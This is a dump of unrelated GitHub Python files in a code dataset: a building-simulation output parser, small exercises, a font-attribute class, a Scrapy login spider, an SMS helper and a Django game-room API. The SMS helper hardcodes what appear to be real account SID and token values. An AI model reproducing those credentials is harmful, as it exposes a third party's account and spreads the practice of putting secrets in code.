columns[0]+=[dv.object_name]\n columns[1]+=[dv.quantity]\n columns[2]+=[dv.unit or '-']\n columns[3]+=['value']\n \n data+=[dv.values]\n \n columns=tuple(zip(*columns))\n data=tuple(zip(*data))\n \n df=pd.DataFrame(index=index,\n data=data,\n columns=pd.MultiIndex.from_tuples(columns,\n names=column_level_names))\n return df\n\n \n def get_interval_periods(self):\n \"\"\"Returns the interval time periods.\n \n :rtype: EPEsoIntervalPeriods\n \n \"\"\"\n p=EPEsoIntervalPeriods()\n p._epesose=self\n return p\n \n \n def get_interval_summary(self):\n \"\"\"Returns a summary of the interval periods and variables.\n \n :rtype: str\n \n \"\"\"\n result=[]\n result.append(self.get_interval_periods().summary())\n \n for v in self.get_interval_variables():\n result.append(v.summary())\n \n return '\\n'.join(result)\n\n\n def get_interval_variable(self,\n report_code):\n \"\"\"Return an interval variable.\n \n :param report_code: The report code of the variable.\n :type report_code: int\n \n :raises KeyError: If an interval variable with the report code does not exist.\n \n :rtype: EPEsoIntervalVariable\n\n \"\"\" \n if report_code in self._data['interval_data']:\n \n v=EPEsoIntervalVariable()\n v._epesose=self\n v._report_code=report_code\n return v \n \n else:\n \n raise KeyError('Report code %s does not match any interval variables.' % (report_code))\n \n \n def get_interval_variables(self):\n \"\"\"Return the interval variables.\n \n :rtype: tuple (EPEsoIntervalVariable)\n \n \"\"\"\n result=[]\n for report_code in self._data['interval_data']:\n if not report_code==2:\n v=EPEsoIntervalVariable()\n v._epesose=self\n v._report_code=report_code\n result.append(v)\n return result\n \n \n def get_monthly_dataframe(self):\n \"\"\"Returns a pandas DataFrame from the monthly data.\n \n :rtype: pandas.DataFrame\n \n \"\"\"\n index=pd.Index(data=self.get_monthly_periods().get_periods(),\n name='time_periods')\n column_level_names=('object_name','quantity','unit','value_type')\n \n data=[]\n columns=[[],[],[],[]]\n \n for mv in self.get_monthly_variables():\n \n columns[0]+=[mv.object_name]*5\n columns[1]+=[mv.quantity]*5\n columns[2]+=[mv.unit]*5\n columns[3]+=['value','min_value','min_time','max_value','max_time']\n \n data+=[mv.values,\n mv.min_values,\n mv.get_min_times(),\n mv.max_values,\n mv.get_max_times()]\n \n columns=tuple(zip(*columns))\n data=tuple(zip(*data))\n \n df=pd.DataFrame(index=index,\n data=data,\n columns=pd.MultiIndex.from_tuples(columns,\n names=column_level_names))\n \n return df\n \n \n def get_monthly_periods(self):\n \"\"\"Returns the monthly time periods.\n \n :rtype: EPEsoMonthlyPeriods\n \n \"\"\"\n p=EPEsoMonthlyPeriods()\n p._epesose=self\n return p\n \n \n def get_monthly_summary(self):\n \"\"\"Returns a summary of the monthly periods and variables.\n \n :rtype: str\n \n \"\"\"\n result=[]\n result.append(self.get_monthly_periods().summary())\n \n for v in self.get_monthly_variables():\n result.append(v.summary())\n \n return '\\n'.join(result)\n\n \n def get_monthly_variables(self):\n \"\"\"Return the monthly variables.\n \n :rtype: tuple (EPEsoMonthlyVariable)\n \n \"\"\"\n result=[]\n for report_code in self._data['monthly_data']:\n if not report_code==4:\n mv=EPEsoMonthlyVariable()\n mv._epesose=self\n mv._report_code=report_code\n result.append(mv)\n return tuple(result)\n \n \n def get_monthly_variable(self,report_code):\n \"\"\"Return a monthly variable.\n \n :param report_code: The report code of the variable.\n :type report_code: int\n \n :raises KeyError: If a monthly variable with the report code does not exist.\n \n :rtype: EPEsoMonthlyVariable\n\n \"\"\" \n if report_code in self._data['monthly_data']:\n \n v=EPEsoMonthlyVariable()\n v._epesose=self\n v._report_code=report_code\n return v \n \n else:\n \n raise KeyError('Report code %s does not match any monthly variables.' % (report_code))\n \n \n def get_number_of_variables(self):\n \"\"\"Returns all the number of variables in the simulation environment.\n \n :returns: A dictionary with keys as the different variable intervals\n and values as the number of variables.\n :rtype: dict (str,int)\n \n \"\"\"\n return {'interval':len(self.get_interval_variables()),\n 'daily':len(self.get_daily_variables()),\n 'monthly':len(self.get_monthly_variables()),\n 'runperiod':len(self.get_run_period_variables()),\n 'annual':len(self.get_annual_variables())}\n\n \n def get_run_period_dataframe(self):\n \"\"\"\n \n \"\"\"\n \n \n def get_run_period_periods(self):\n \"\"\"Returns the run period time periods.\n \n :rtype: EPEsoRunPeriodPeriods\n \n \"\"\"\n p=EPEsoRunPeriodPeriods()\n p._epesose=self\n return p\n \n \n def get_run_period_summary(self):\n \"\"\"\n \n \"\"\"\n return ''\n #return '--- TO DO ---'\n \n \n def get_run_period_variables(self):\n \"\"\"Return the run period variables.\n \n :rtype: tuple (EPEsorunPeriodVariable)\n \n \"\"\"\n result=[]\n for report_code in self._data['run_period_data']:\n if not report_code==5:\n mv=EPEsoRunPeriodVariable()\n mv._epesose=self\n mv._report_code=report_code\n result.append(mv)\n return tuple(result)\n \n \n def get_run_period_variable(self):\n \"\"\"\n \n \"\"\"\n \n \n def get_timezone(self):\n \"\"\"Returns the time zone as a datetime.timezone instance.\n \n :rtype: datetime.timezone\n \n \"\"\"\n return datetime.timezone(datetime.timedelta(hours=float(self.time_zone)))\n \n\n def get_variables(self):\n \"\"\"Returns all the variables in the simulation environment.\n \n :returns: A dictionary with keys as the different variable intervals\n and values as the interval objects.\n :rtype: dict(str,list)\n \n \"\"\"\n return {'interval':self.get_interval_variables(),\n 'daily':self.get_daily_variables(),\n 'monthly':self.get_monthly_variables(),\n 'runperiod':self.get_run_period_variables(),\n 'annual':self.get_annual_variables()}\n\n \n \n \n @property\n def latitude(self):\n \"\"\"The latitude of the simulation environment section.\n \n :returns: The latitude in degrees.\n :rtype: float\n \n \"\"\"\n return float(self._data['latitude'])\n \n \n @property\n def longitude(self):\n \"\"\"The longitude of the simulation environment section.\n \n :returns: The longitude in degrees.\n :rtype: float\n \n \"\"\"\n return float(self._data['longitude'][2])\n \n \n \n def summary(self):\n \"\"\"Returns a summary of the all periods and variables in the simulation environment.\n \n :rtype: str\n \n \"\"\"\n return '\\n'.join(['INTERVAL DATA',\n self.get_interval_summary(),\n 'DAILY DATA',\n self.get_daily_summary(),\n 'MONTHLY DATA',\n self.get_monthly_summary(),\n 'RUN PERIOD DATA',\n self.get_run_period_summary(),\n 'ANNUAL DATA',\n self.get_annual_summary()\n ])\n \n \n \n \n @property\n def time_zone(self):\n \"\"\"The time zone of the simulation environment section.\n \n :rtype: str\n \n \"\"\"\n return self._data['time_zone'][3]\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"stevenkfirth/eprun","sub_path":"eprun/_old/epeso_simulation_environment.py","file_name":"epeso_simulation_environment.py","file_ext":"py","file_size_in_byte":16198,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"4211863813","text":"'''\nCreate a Mad Libs program that reads in text files and lets the user add\ntheir own text anywhere the word ADJECTIVE, NOUN, ADVERB, or VERB\nappears in the text file. The program would find these occurrences\nand prompt the user to replace them. The results should be printed\nto the screen and saved to a new text file.\n'''\n\nimport re\n\n# extracting text from file\nfile = open(\"mad_libs_text.txt\")\ntext = file.read()\nfile.close()\n\nkeywords = ('ADJECTIVE', 'NOUN', 'VERB', 'ADVERB')\n\n# detecting keywords and substituting them with user input\ndef replace_keywords(string, keywords_list):\n\n # checks each keyword from the list against string till no match is found\n while True:\n keyword_found = False # flag used to determine if string has any match after the iteration\n\n for keyword in keywords_list:\n regex = re.compile(r\"{0}\".format(keyword)) # lowercase matches are not included in case keyword in a part of some word\n result = regex.search(string)\n\n user_value = ''\n if result:\n user_value = input(f\"Please enter {keyword}:\\n\")\n keyword_found = True # function won't exit the loop when this flag is True (loop through keys again)\n\n if user_value != '':\n string = regex.sub(user_value, string, count=1) # change 1st occurrence of the keyword\n\n if keyword_found == False: # if nothing found during last iteration, return result\n return string\n\n\nresult = replace_keywords(text, keywords)\nprint(result)\n\n# creating new file with results\nnew_file = open(\"mad_libs_new_text.txt\", \"w\")\nnew_file.write(result)\nnew_file.close()\n\n","repo_name":"valievav/automate_the_boring_stuff_with_python","sub_path":"Chapter_08_Reading_and_writing_files/mad_libs.py","file_name":"mad_libs.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30622377889","text":"def roman_to_int(s: str) -> int:\n table = {\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000,\n }\n # For keeping track of the immediate previous letter\n prev = s[0]\n\n total = table[prev]\n for c in s[1:]:\n # Special cases to handle. If we found one, we just undo\n # the previous addition (by sustracting it) and add the\n # value of the special case\n if (c == 'V' or c == 'X') and prev == 'I':\n total = total - table[prev] + (table[c] - table[prev])\n elif (c == 'L' or c == 'C') and prev == 'X':\n total = total - table[prev] + (table[c] - table[prev])\n elif (c == 'D' or c == 'M') and prev == 'C':\n total = total - table[prev] + (table[c] - table[prev])\n else:\n # Otherwise, just add the letter value\n total += table[c]\n prev = c\n return total\n\n\nif __name__ == '__main__':\n assert roman_to_int('III') == 3\n assert roman_to_int('LVIII') == 58\n assert roman_to_int('MCMXCIV') == 1994\n","repo_name":"leolas95/devcompzo-interview-questions","sub_path":"technical/roman-to-integer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25301084519","text":"# -*- coding: utf-8 -*-\nfrom __future__ import annotations\n\nimport typing as T\n\nfrom ..fonts.enums import Weight\nfrom ..utils import covert_hex_to_rbg\n\n__all__ = [\"TextAttribute\"]\n\n\ndef _parse_color_output(val: T.Union[str, T.Iterable[int]]):\n color_hex = None\n red, green, blue = None, None, None\n if isinstance(val, str):\n color_hex = val\n else:\n if len(val) != 3:\n raise ValueError(\"Either a Iterable of 3 items or a string must be passed.\")\n red, green, blue = val\n if color_hex:\n red, green, blue = covert_hex_to_rbg(color_hex)\n if not ((0 <= red <= 65535) and (0 <= green <= 65535) and (0 <= blue <= 65535)):\n raise ValueError(\"red, green, blue should be between 0 and 65535.\")\n return (red, green, blue)\n\n\nclass TextAttribute:\n \"\"\":class:`TextAttribute` defines the properties/attributes of the\n text within a specific range of the text.\n\n\n A :class:`TextAttribute` object can define multiple properties at\n the same time, for example, it can change the :attr:`background_color`,\n as well as, :attr:`foreground_color`. Also, a :class:`TextAttribute` can\n be used for multiple times for different texts.\n By default, an attribute has an inclusive range from ``0`` to the\n end of the text ``-1``, ie. ``[0, -1]``.\n \"\"\"\n\n def __init__(\n self,\n start_index: int = 0,\n end_index: int = -1,\n *,\n allow_breaks: bool | None = None,\n background_alpha: float | None = None,\n background_color: T.Union[str, T.Iterable[int]] | None = None,\n foreground_alpha: float | None = None,\n foreground_color: T.Union[str, T.Iterable[int]] | None = None,\n fallback: bool | None = None,\n family: str | None = None,\n weight: Weight | None = None,\n line_height: float | None = None,\n ) -> None:\n \"\"\"Initialize :class:`TextAttribute`.\n\n Parameters\n ----------\n start_index : int, optional\n The start index of the range, by default 0 (start of the string).\n end_index : int, optional\n End index of the range. The character at this index is not included\n in the range, by default -1 (end of the string).\n \"\"\"\n self.start_index = start_index\n self.end_index = end_index\n if allow_breaks:\n self.allow_breaks = allow_breaks\n if background_alpha:\n self.background_alpha = background_alpha\n if background_color:\n self.background_color = background_color\n if foreground_alpha:\n self.foreground_alpha = foreground_alpha\n if foreground_color:\n self.foreground_color = foreground_color\n if fallback:\n self.fallback = fallback\n if family:\n self.family = family\n if weight:\n self.weight = weight\n if line_height:\n self.line_height = line_height\n\n @property\n def start_index(self) -> int:\n \"\"\"It is the end index of the range.\n\n Raises\n ------\n ValueError\n If the value is not an :class:`int`.\n \"\"\"\n return self._start_index\n\n @start_index.setter\n def start_index(self, val: int) -> None:\n if not isinstance(val, int):\n raise ValueError(\"'start_index' should be an int\")\n # check if the value is negative\n if val < 0:\n raise ValueError(\"'start_index' should be a positive int\")\n self._start_index = val\n\n @property\n def end_index(self) -> int:\n \"\"\"It is the start of the range. The character at this index is not\n included in the range.\n\n Raises\n ------\n ValueError\n If the value is not an :class:`int`.\n \"\"\"\n return self._end_index\n\n @end_index.setter\n def end_index(self, val: int) -> None:\n if not isinstance(val, int):\n raise ValueError(\"'end_index' should be an int\")\n # check if the value is negative\n if val < 0 and val != -1:\n raise ValueError(\"'end_index' should be a positive int\")\n self._end_index = val\n\n @property\n def allow_breaks(self) -> T.Union[bool, None]:\n \"\"\"Whether to break text or not.\n\n If breaks are disabled, the range will be kept in a single run,\n as far as possible.\n \"\"\"\n if hasattr(self, \"_allow_breaks\"):\n return self._allow_breaks\n return None\n\n @allow_breaks.setter\n def allow_breaks(self, val: bool) -> None:\n self._allow_breaks = bool(val)\n\n @property\n def background_alpha(self) -> T.Union[float, None]:\n \"\"\"The background_alpha of the text.\n\n Raises\n ------\n ValueError\n If the value is not between 0 and 1.\n \"\"\"\n if hasattr(self, \"_background_alpha\"):\n return self._background_alpha\n return None\n\n @background_alpha.setter\n def background_alpha(self, val: float) -> None:\n if not (0 <= val <= 1):\n raise ValueError(\"'val' should be between 0 and 1\")\n self._background_alpha = val\n\n @property\n def background_color(self) -> T.Union[T.Tuple[int], None]:\n \"\"\"The background color of the region.\n\n If the input is a :class:`str` the value is considered as\n string representation of color from\n `CSS Specification `_.\n The color is then parsed and :class:`ValueError` is raised\n if the color is invalid.\n\n If the input is a :class:`collections.abc.Iterable` then the items\n in them are parsed in the order of ``red, green, blue`` and checked\n whether they are valid (between 0 and 65535).\n\n\n Returns either ``None`` or a :class:`tuple` with 3 elements\n representing red, green, blue respectively. The value of each\n items in that tuple ranges from 0 to 65535.\n\n Raises\n ------\n ValueError\n If the value passed isn't a :class:`collections.abc.Iterable` of 3\n elements or a string. Another condition when `ValueError` is\n raised is when the color passed is invalid.\n\n \"\"\"\n if hasattr(self, \"_background_color\"):\n return self._background_color\n return None\n\n @background_color.setter\n def background_color(self, val: T.Union[str, T.Iterable[int]]) -> None:\n self._background_color = _parse_color_output(val)\n\n @property\n def foreground_alpha(self) -> T.Union[float, None]:\n \"\"\"The foreground_alpha of the text.\n\n Raises\n ------\n ValueError\n If the value is not between 0 and 1.\n \"\"\"\n if hasattr(self, \"_foreground_alpha\"):\n return self._foreground_alpha\n return None\n\n @foreground_alpha.setter\n def foreground_alpha(self, val: float) -> None:\n if not (0 <= val <= 1):\n raise ValueError(\"'val' should be between 0 and 1\")\n self._foreground_alpha = val\n\n @property\n def foreground_color(self) -> T.Union[T.Tuple[int], None]:\n \"\"\"The foreground color attribute.\n\n If the input is a :class:`str` the value is considered as\n string representation of color from\n `CSS Specification `_.\n The color is then parsed and :class:`ValueError` is raised\n if the color is invalid.\n\n If the input is a :class:`collections.abc.Iterable` then the items\n in them are parsed in the order of ``red, green, blue`` and checked\n whether they are valid (between 0 and 65535).\n\n\n Returns either ``None`` or a :class:`tuple` with 3 elements\n representing red, green, blue respectively. The value of each\n items in that tuple ranges from 0 to 65535.\n\n Raises\n ------\n ValueError\n If the value passed isn't a :class:`collections.abc.Iterable` of 3\n elements or a string. Another condition when `ValueError` is\n raised is when the color passed is invalid.\n\n \"\"\"\n if hasattr(self, \"_foreground_color\"):\n return self._foreground_color\n return None\n\n @foreground_color.setter\n def foreground_color(self, val: T.Union[str, T.Iterable[int]]) -> None:\n self._foreground_color = _parse_color_output(val)\n\n @property\n def fallback(self) -> bool:\n \"\"\"Enable or disable fallbacks.\n\n If fallback is disabled, characters will only be used from the\n closest matching font on the system. No fallback will be done to\n other fonts on the system that might contain the characters in\n the text.\n \"\"\"\n if hasattr(self, \"_fallback\"):\n return self._fallback\n return None\n\n @fallback.setter\n def fallback(self, val: bool) -> None:\n self._fallback = bool(val)\n\n @property\n def family(self) -> T.Union[str, None]:\n \"\"\"The font family the text should render. Can be a comma seperated\n list of fonts in a string.\n\n Raises\n ------\n ValueError\n If value isn't a str.\n \"\"\"\n if hasattr(self, \"_family\"):\n return self._family\n return None\n\n @family.setter\n def family(self, val: str) -> None:\n if not isinstance(val, str):\n raise ValueError(\"'family' must be a string\")\n self._family = val\n\n @property\n def weight(self) -> T.Union[Weight, None]:\n \"\"\"The font weight of the text.\n\n Raises\n ------\n ValueError\n If value isn't a str.\n \"\"\"\n if hasattr(self, \"_weight\"):\n return self._weight\n return None\n\n @weight.setter\n def weight(self, val: Weight) -> None:\n if not isinstance(val, Weight):\n raise ValueError(\"'weight' must be a Weight\")\n self._weight = val\n\n @property\n def line_height(self) -> T.Union[float, None]:\n \"\"\"The line height of the text.\n\n Raises\n ------\n ValueError\n If value isn't a float.\n \"\"\"\n if hasattr(self, \"_line_height\"):\n return self._line_height\n return None\n\n @line_height.setter\n def line_height(self, val: float) -> None:\n if not isinstance(val, float):\n raise ValueError(\"'line_height' must be a float\")\n self._line_height = val\n","repo_name":"ManimCommunity/ManimPango","sub_path":"manimpango/attributes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10453,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"67"} +{"seq_id":"19688111763","text":"import random\r\n\r\na_batas_atas = 30\r\nb_batas_atas = 10\r\nc_batas_atas = 10\r\nd_batas_atas = 10\r\n\r\njumlah_populasi = 6\r\n\r\nNUM_GENERATIONS = 50\r\n\r\nCROSSOVER_PROBABILITY = 0.8\r\nMUTATION_PROBABILITY = 0.1\r\n\r\nNUM_ELITES = 5\r\n\r\ndef evaluasi_kromosom(kromosom):\r\n a, b, c, d = kromosom\r\n return abs((a + 4*b + 2*c + 3*d) - 30) \r\n\r\ndef inisialisasi_populasi():\r\n populasi = []\r\n for _ in range(jumlah_populasi):\r\n kromosom = [random.randint(0, a_batas_atas),\r\n random.randint(0, b_batas_atas),\r\n random.randint(0, c_batas_atas),\r\n random.randint(0, d_batas_atas)]\r\n populasi.append(kromosom)\r\n return populasi\r\n\r\ndef select_parents(populasi):\r\n total_fitness = sum(1 / (1 + evaluasi_kromosom(kromosom)) for kromosom in populasi)\r\n probabilities = [(1 / (1 + evaluasi_kromosom(kromosom))) / total_fitness for kromosom in populasi]\r\n \r\n parents = []\r\n for _ in range(jumlah_populasi):\r\n parent = random.choices(populasi, probabilities)[0]\r\n parents.append(parent)\r\n return parents\r\n\r\n\r\ndef crossover(parent1, parent2):\r\n if random.random() < CROSSOVER_PROBABILITY:\r\n crossover_point = random.randint(1, len(parent1) - 1)\r\n child1 = parent1[:crossover_point] + parent2[crossover_point:]\r\n child2 = parent2[:crossover_point] + parent1[crossover_point:]\r\n return child1, child2\r\n else:\r\n return parent1, parent2\r\n\r\ndef mutate(kromosom):\r\n mutated_kromosom = kromosom.copy()\r\n for i in range(len(mutated_kromosom)):\r\n if random.random() < MUTATION_PROBABILITY:\r\n mutated_kromosom[i] = random.randint(0, [a_batas_atas, b_batas_atas, c_batas_atas, d_batas_atas][i])\r\n return mutated_kromosom\r\n\r\ndef select_new_generation(populasi, parents, elites):\r\n new_generation = elites.copy()\r\n while len(new_generation) < jumlah_populasi:\r\n parent1, parent2 = random.sample(parents, 2)\r\n child1, child2 = crossover(parent1, parent2)\r\n new_generation.extend([mutate(child1), mutate(child2)])\r\n return new_generation[:jumlah_populasi]\r\n\r\npopulasi = inisialisasi_populasi()\r\n\r\nevaluasi_populasi = [(kromosom, evaluasi_kromosom(kromosom)) for kromosom in populasi]\r\n\r\nfor _ in range(NUM_GENERATIONS):\r\n evaluasi_populasi.sort(key=lambda x: x[1])\r\n elites = [kromosom for kromosom, _ in evaluasi_populasi[:NUM_ELITES]]\r\n parents = select_parents([kromosom for kromosom, _ in evaluasi_populasi])\r\n populasi = select_new_generation(populasi, parents, elites)\r\n evaluasi_populasi = [(kromosom, evaluasi_kromosom(kromosom)) for kromosom in populasi]\r\n\r\nbest_kromosom, best_fitness = min(evaluasi_populasi, key=lambda x: x[1])\r\nprint(\"Solusi terbaik:\")\r\nprint(\"Nilai a =\", best_kromosom[0])\r\nprint(\"Nilai b =\", best_kromosom[1])\r\nprint(\"Nilai c =\", best_kromosom[2])\r\nprint(\"Nilai d =\", best_kromosom[3])\r\nprint(\"Fitness terbaik:\", best_fitness)\r\n","repo_name":"kahlilz/Kahlil-Gibran-Saputra_2109076032-Kecerdasan-Buatan-","sub_path":"Kecerdasan Buatan(Algoritma Genetik).py","file_name":"Kecerdasan Buatan(Algoritma Genetik).py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20278157735","text":"import scrapy\nfrom scrapy.http import Request\nimport json\nimport user_data as user\n\nclass Link():\n link = ''\n date = ''\n def write(self,filename):\n with open(filename,'w') as fh:\n json.dump(self,fh,cls=SpiderEncoder, indent=4)\n\nclass SpiderEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o,Link):\n return {'link': o.link,\n 'date': o.date}\n return super().default(o)\n\nclass DynamicLinkSpider(scrapy.Spider):\n name = 'link_spider'\n start_urls = [\n \"https://moderation.vlstats.com/home/login\"\n ]\n link = ''\n\n def start_requests(self):\n return [Request(url = \"https://moderation.vlstats.com/\", callback = self.login)]\n\n def login(self, response):\n return scrapy.FormRequest('https://moderation.vlstats.com/home/login',\n formdata={\"username\": user.parse_login, \"password\": user.parse_password},\n callback=self.parse_url)\n\n def parse_url(self,response):\n yield response.follow('https://moderation.vlstats.com/agency/invitations',callback=self.parse)\n\n def parse(self, response, **kwargs):\n links = response.xpath(\"//div[@class='input-group']//input[@id='invitationLink-0']//@value\").extract()[0]\n date = response.xpath(\"//div[@class='col-md-8']//small//text()\").get()\n print('----------------------------------------------------')\n print(links)\n print(date)\n print('----------------------------------------------------')\n l = Link()\n l.link=links\n clear_date = date[date.find('until') + 6:]\n l.date = clear_date\n l.write('parse_data.txt')\n","repo_name":"RomanBezuhlyii/ChatZen_Bot","sub_path":"link_spy/link_spy/spiders/link_spider.py","file_name":"link_spider.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17661656608","text":"# 2d lists do not have to be rectangular\na = [ [ 1, 2, 3 ] ,\n [ 4, 5 ],\n [ 6 ],\n [ 7, 8, 9, 10 ] ]\n\nrows = len(a)\nfor row in range(rows):\n columns = len(a[row]) # now cols depends on each row\n print(\"Row\", row, \"has\", columns, \"columns: \", end=\"\")\n for column in range(columns):\n print(a[row][column], \" \", end=\"\")\n print()\n","repo_name":"theguyoverthere/CMU15-112-Spring17","sub_path":"src/Week5/Ragged 2d List/Ragged 2d List.py","file_name":"Ragged 2d List.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72593329812","text":"\r\n\r\n\r\n# 主帐号\r\naccountSid = '8aaf07086a43ad03016a582c2ea31652'\r\n\r\n# 主帐号Token\r\naccountToken = '1548573782d6430aab9bca1053b4b4b2'\r\n\r\n# 应用Id\r\nappId = '8aaf07086a43ad03016a582c2ef91659'\r\n\r\n# 请求地址,格式如下,不需要写http://\r\nserverIP = 'app.cloopen.com'\r\n\r\n# 请求端口\r\nserverPort = '8883'\r\n\r\n# REST版本号\r\nsoftVersion = '2013-12-26'\r\n\r\n\r\n# 发送模板短信\r\n# @param to 手机号码\r\n# @param datas 内容数据 格式为列表 例如:['12','34'],如不需替换请填 ''\r\n# @param $tempId 模板Id\r\n\r\n\r\nclass CCP(object):\r\n \"\"\"自己封装的发送短信的辅助类\"\"\"\r\n # 用来保存对象的类属性\r\n instance = None\r\n\r\n def __new__(cls):\r\n # 判断CCP类有没有已经创建好的对象,如果没有,创建一个对象,并且保存\r\n # 如果有,则将保存的对象直接返回\r\n if cls.instance is None:\r\n obj = super(CCP, cls).__new__(cls)\r\n\r\n # 初始化REST SDK\r\n from ihome.libs.yuntongxun.CCPRestSDK import REST\r\n obj.rest = REST(serverIP, serverPort, softVersion)\r\n obj.rest.setAccount(accountSid, accountToken)\r\n obj.rest.setAppId(appId)\r\n\r\n cls.instance = obj\r\n\r\n return cls.instance\r\n\r\n def send_template_sms(self, to, datas, temp_id):\r\n\r\n result = self.rest.sendTemplateSMS(to, datas, temp_id)\r\n status_code = result.get(\"statusCode\")\r\n if status_code == \"000000\":\r\n # 表示发送短信成功\r\n print(\"++++++发送短信成功+++++++\")\r\n return 0\r\n else:\r\n # 发送失败\r\n return -1\r\n","repo_name":"CriusCrius/ihome_flask","sub_path":"ihome/libs/yuntongxun/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13234242176","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport json\n\nimport requests\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom rest_framework import viewsets\nfrom rest_framework.authentication import SessionAuthentication, TokenAuthentication\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.decorators import detail_route\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom ws4redis.publisher import RedisPublisher\nfrom ws4redis.redis_store import RedisMessage\n\nfrom api.serializers import PanelUserSerializer\nfrom game.models import Room\nfrom server.models import GameServer\nfrom .serializers import RoomSerializer\n\nUser = get_user_model()\n\n\ndef _get_available_server():\n game_server_stats = {}\n\n for game_server in GameServer.objects.exclude(status=9):\n game_server_stats[game_server] = game_server.stats['ram']\n\n return min(game_server_stats, key=game_server_stats.get)\n\n\nclass RoomViewSet(viewsets.ModelViewSet):\n queryset = Room.objects.all()\n serializer_class = RoomSerializer\n lookup_field = 'slug'\n\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication, SessionAuthentication)\n\n @detail_route(methods=['get'])\n def users(self, request, **kwargs):\n room = self.get_object()\n\n serializer = PanelUserSerializer(data=room.users, many=True)\n serializer.is_valid()\n\n return Response(serializer.data)\n\n @detail_route(methods=['get'])\n def allowed_actions(self, request, **kwargs):\n room = self.get_object()\n\n if room.status == 0:\n return Response({\n 'join': request.user.room is None and room.users.count() < room.max_players,\n 'leave': request.user.room == room,\n 'ready': request.user.room == room and not request.user.ready_to_play,\n 'unready': request.user.room == room and request.user.ready_to_play,\n })\n else:\n return Response({})\n\n @detail_route(methods=['post'])\n def join(self, request, **kwargs):\n room = self.get_object()\n\n if request.user.is_admin:\n raise ValidationError('User jest już adminem')\n\n request.user.room = room\n request.user.ready_to_play = False\n request.user.save()\n\n response = self.users(request, **kwargs)\n\n msg = RedisMessage(json.dumps(response.data))\n RedisPublisher(facility='room_detail', groups=[str(room)]).publish_message(msg)\n\n return response\n\n @detail_route(methods=['post'])\n def leave(self, request, **kwargs):\n room = self.get_object()\n\n if request.user.room != room:\n raise ValidationError('Nie możesz opuścić pokoju w którym Cie nie ma')\n\n request.user.room = None\n request.user.save(update_fields=['room'])\n\n if request.user.is_admin:\n\n request.user.is_admin = False\n request.user.save(update_fields=['is_admin'])\n\n if room.users.exists():\n new_admin = room.users.first()\n new_admin.is_admin = True\n new_admin.save(update_fields=['is_admin'])\n\n if not room.users.exists():\n # TODO: self.destroy(request, **kwargs)\n pass\n\n response = self.users(request, **kwargs)\n\n msg = RedisMessage(json.dumps(response.data))\n RedisPublisher(facility='room_detail', groups=[str(room)]).publish_message(msg)\n\n return response\n\n @detail_route(methods=['post'])\n def unready(self, request, **kwargs):\n request.user.ready_to_play = False\n request.user.save(update_fields=['ready_to_play'])\n\n room = self.get_object()\n\n response = self.users(request, **kwargs)\n msg = RedisMessage(json.dumps(response.data))\n RedisPublisher(facility='room_detail', groups=[str(room)]).publish_message(msg)\n\n return response\n\n @detail_route(methods=['post'])\n def ready(self, request, **kwargs):\n request.user.ready_to_play = True\n request.user.save(update_fields=['ready_to_play'])\n\n room = self.get_object()\n game_ready = all([user.ready_to_play for user in room.users.all()])\n\n if game_ready:\n return self._start_game(room)\n\n else:\n response = self.users(request, **kwargs)\n msg = RedisMessage(json.dumps(response.data))\n RedisPublisher(facility='room_detail', groups=[str(room)]).publish_message(msg)\n\n return response\n\n @detail_route(methods=['post'])\n def finished(self, request, **kwargs):\n room = self.get_object()\n\n received_data = request.data\n\n winner = User.objects.get(id=received_data['winner']['panel_user_id'])\n\n winner.wins += 1\n winner.save()\n\n room.status = 0\n room.save()\n\n for user in room.users.all():\n user.ready_to_play = False\n user.save()\n\n ret_data = {\n 'url_path': reverse('room:detail', args=[room.slug])\n }\n\n return Response(status=200, data=json.dumps(ret_data))\n\n def _start_game(self, room):\n\n server = _get_available_server()\n server_user_token, _ = Token.objects.get_or_create(user=server.panel_user)\n\n if server is None:\n return Response(status=400, data=\"{'error': 'Brak dostępnego serwera!'}\")\n\n serialized_data = self.get_serializer(instance=room).data\n\n serialized_data.update({\n 'auth_token': str(server_user_token),\n 'panel_room_id': room.pk,\n 'panel_room_slug': room.slug\n })\n\n data = json.dumps(serialized_data)\n server_without_leading_slash = server.url.rstrip('/')\n\n response = requests.post(\n server_without_leading_slash + \"/api/rooms/create/\",\n data=data,\n headers={\n \"Authorization\": \"Token %s\" % server.auth_token,\n \"Content-Type\": \"application/json\",\n })\n\n if response.status_code == 201:\n\n room.server = server\n room.save()\n\n for user in room.users.all():\n user.total_games += 1\n user.save()\n\n response_data = response.json()\n\n for user_data in response_data.get('users'):\n response = {\n 'type': \"PLAY\",\n 'url': server_without_leading_slash + \"/%s/\" % user_data.get('token'),\n }\n msg = RedisMessage(json.dumps(response))\n user = User.objects.get(id=user_data['panel_user_id'])\n RedisPublisher(facility='room_detail', users=[user.username]).publish_message(msg)\n\n room.status = 1\n 